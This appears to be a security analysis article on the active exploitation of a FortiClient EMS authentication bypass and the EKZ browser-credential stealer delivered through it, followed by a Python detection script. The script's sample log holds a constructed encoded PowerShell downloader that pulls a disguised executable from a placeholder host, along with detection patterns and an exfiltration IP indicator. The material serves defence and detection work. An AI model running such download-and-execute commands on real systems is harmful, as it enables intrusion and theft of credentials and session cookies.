Enterprise endpoint management platforms exist to give security and IT teams centralized control over every managed device in the organization. The implicit trust that makes these platforms operationally powerful — the ability to push configurations, execute scripts, and deploy software across thousands of endpoints simultaneously — is precisely what makes them catastrophic when compromised. The active exploitation of CVE-2026-35616 in Fortinet’s FortiClient Endpoint Management Server, documented by Arctic Wolf in May 2026, demonstrates what that catastrophic scenario looks like in production: an attacker who bypasses API authentication on a single EMS server gains a management pathway to every endpoint the platform governs, without requiring a separate intrusion into each device.
This is not a vulnerability that allows an attacker to compromise one machine. It is a vulnerability that allows an attacker to compromise one management server and inherit its authority over the entire managed fleet.
How the Attack Chain Weaponized FortiClient’s Own Infrastructure
CVE-2026-35616 is a pre-authentication API access bypass in FortiClient EMS carrying a CVSS score of 9.1. The vulnerability allows unauthenticated access to privileged API functionality, enabling attackers to modify management configurations and endpoint policies without valid credentials. Fortinet patched the issue in FortiClient EMS 7.4.7, but organizations running unpatched versions remained exposed to an attack chain that Arctic Wolf observed being actively exploited in May 2026.
Following successful authentication bypass, the threat actors modified Remote Access Profile configurations and endpoint policies to insert malicious PowerShell scripts for execution across managed endpoints. The execution pattern, as Arctic Wolf characterized it, resembled legitimate management operations — because it was using legitimate management operations. The attacker wasn’t injecting code through a novel execution pathway. They were using FortiClient’s own management infrastructure to push commands to endpoints in the same manner that authorized administrators use it daily.
The payload delivery mechanism reinforced that legitimacy signal at every layer. A legitimate FortiClient executable, fortitray.exe, was leveraged to launch a .cmd script through cmd.exe. The .cmd script invoked a Base64-encoded PowerShell command that downloaded the malicious payload, executed it, and exfiltrated results to attacker-controlled infrastructure. The malicious executable itself was named FortiEndpoint_Patch.exe — designed to appear as a routine Fortinet endpoint update to any employee or security tool that observed it running.
The EKZ Infostealer and Its Post-Compromise Access Implications
The payload delivered through this campaign is a previously undocumented Windows information stealer targeting Chromium and Gecko-based browsers. Named EKZ infostealer by Arctic Wolf, it harvests passwords, session cookies, autofill data including credit card information, addresses, and phone numbers from browser credential stores. The harvested data is written to a log file in the ProgramData directory. Exfiltration is handled by the PowerShell script component rather than the stealer itself, transmitting the captured data to 83.138.53[.]110 via HTTP POST.
The session cookie harvesting capability is the element that carries the most significant downstream access implications. Session cookies from authenticated browser sessions represent valid, active access to cloud services, SaaS applications, internal web applications, and any other service where the browser maintains an authenticated session. Unlike password harvesting — which requires the attacker to authenticate with stolen credentials and may trigger MFA challenges — session cookie reuse presents an already-authenticated session to target services. MFA protections that are correctly configured to challenge new authentication events provide no defense against an attacker presenting a valid existing session token.
Arctic Wolf’s explicit note that session reuse may circumvent MFA prompts is the detail that should drive the urgency of incident response for organizations that ran vulnerable FortiClient EMS versions. An organization that patches the EMS vulnerability and rotates administrative credentials has addressed the access vector but may still have active attacker sessions persisting across cloud and SaaS infrastructure from cookies harvested before remediation.
One Compromised Management Server, Fleet-Wide Execution Reach
The architectural implication of this attack chain deserves direct articulation for executive and board-level security conversations. Modern endpoint management platforms — FortiClient EMS, Microsoft Intune, CrowdStrike Falcon, and their equivalents — are designed to provide centralized, authenticated control over every managed endpoint. That centralization is a security feature: it enables consistent policy enforcement, rapid patch deployment, and coordinated incident response. It also creates a high-value single point of compromise where control of the management plane translates directly into control of the managed fleet.
Arctic Wolf’s characterization of the exploitation impact is precise: once the attacker had a route to modify EMS-managed configuration, every managed endpoint became a potential execution target without requiring a separate intrusion path to each device. An organization with 10,000 managed endpoints running FortiClient effectively had 10,000 potential malware delivery targets accessible through a single compromised server. The attacker’s effort to compromise those endpoints individually — each requiring its own access vector, its own detection evasion, its own persistence establishment — was entirely bypassed by controlling the management infrastructure.
This is the threat model that security architects building endpoint management programs need to incorporate into their risk assessments. The management plane is not just administrative infrastructure. It is an amplification platform for any attacker who reaches it, and its security posture needs to reflect that amplification capability in how authentication, network access, and privilege boundaries are designed.
Detection Gaps That This Campaign Specifically Exploited
The campaign’s use of legitimate FortiClient executables, standard management operations, and a payload named to resemble an authorized update creates specific detection challenges that security operations teams should explicitly address in their detection engineering programs.
Process execution monitoring that trusts fortitray.exe as a known-good FortiClient component without scrutinizing its child process behavior will miss the .cmd script launch that initiates the credential theft chain. Behavioral detection logic needs to flag unexpected child process creation from endpoint security tool executables — not just known-malicious binaries launching malicious children, but trusted security binaries launching scripting interpreters or command shells in unexpected contexts.
The Base64-encoded PowerShell execution pattern is a well-documented indicator that most EDR platforms monitor, but the encoding within a legitimate management operation context may produce lower-confidence detections than the same pattern in an obviously malicious context. Tuning PowerShell script block logging and AMSI inspection to capture and analyze encoded execution regardless of the parent process origin is the configuration adjustment that closes this gap.
At the network level, HTTP POST connections to 83.138.53[.]110 from endpoints during the active campaign window are the exfiltration indicator that network detection tools are positioned to catch even when endpoint behavioral detection misses the execution chain.
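The three detection adjustments described above (child processes of fortitray.exe, encoded PowerShell regardless of parent, and POSTs to the quoted address) as one rule set run over sample telemetry. This is an added example, not code from Arctic Wolf, Fortinet or the article; the Sysmon-style record layout and field names are assumptions and every record is constructed.

```python
"""Added example (not Arctic Wolf's or Fortinet's code) covering the three gaps above.
Records are constructed, Sysmon-style dicts; field names are assumptions."""
import base64
import re

EXFIL_IP = "83.138.53.110"  # indicator quoted (defanged) in the article
TRUSTED_SECURITY_PARENTS = {"fortitray.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (PowerShell uses UTF-16LE), or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def evaluate(event):
    """Return the names of every detection that fires for one log record."""
    hits = []
    if event.get("type") == "process_create":
        parent = event.get("parent_image", "").lower().rsplit("\\", 1)[-1]
        child = event.get("image", "").lower().rsplit("\\", 1)[-1]
        if parent in TRUSTED_SECURITY_PARENTS and child in SCRIPT_HOSTS:  # gap 1: trusted binary -> shell
            hits.append("security_tool_spawned_script_host")
        decoded = decode_encoded_command(event.get("command_line", ""))  # gap 2: fires for any parent
        if decoded is not None:
            hits.append("encoded_powershell")
            if re.search(r"DownloadFile|DownloadString|Invoke-WebRequest", decoded, re.I):
                hits.append("encoded_powershell_downloader")  # decoded content tells the analyst why
    elif event.get("type") == "network_connect" and event.get("dest_ip") == EXFIL_IP:
        hits.append("http_post_to_exfil_ip")  # gap 3: network-level exfiltration indicator
    return hits

def encode_ps(script):  # builds the constructed -enc argument used in the sample log
    return base64.b64encode(script.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [  # constructed records mirroring the chain described in the article
    {"type": "process_create", "parent_image": r"C:\Program Files\Fortinet\FortiClient\FortiTray.exe",
     "image": r"C:\Windows\System32\cmd.exe", "command_line": r"cmd.exe /c C:\ProgramData\update.cmd"},
    {"type": "process_create", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -nop -w hidden -enc " + encode_ps(
         "(New-Object Net.WebClient).DownloadFile('http://PLACEHOLDER/p.exe', 'C:\\ProgramData\\FortiEndpoint_Patch.exe')")},
    {"type": "network_connect", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "dest_ip": EXFIL_IP},
]
```

Feeding each record to evaluate() yields the first detection for the fortitray.exe-to-cmd.exe hop, both encoded-PowerShell detections for the second record, and the exfiltration indicator for the network record.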
The Broader Pattern: Security Vendor Infrastructure as an Attack Target
FortiClient EMS exploitation sits within the pattern that has been building throughout 2026: attackers deliberately targeting security and management infrastructure because compromise of those platforms provides disproportionate access to everything beneath them. Cisco Secure Workload, Trend Micro Apex One, and now FortiClient EMS have all appeared in active exploitation news within weeks of each other — each representing a security platform whose compromise provides privileged access to the enterprise environments it was deployed to protect.
For CISOs conducting platform risk reviews, the consistent targeting of security management infrastructure is the signal that should be driving investment in management plane isolation, privileged access workstation architectures for security tool administration, and anomaly detection specifically covering unexpected configuration changes in endpoint management platforms. The security tool itself has become the attack surface. Defending it requires the same rigor applied to the infrastructure it governs.
Research and Intelligence Sources: kudelskisecurit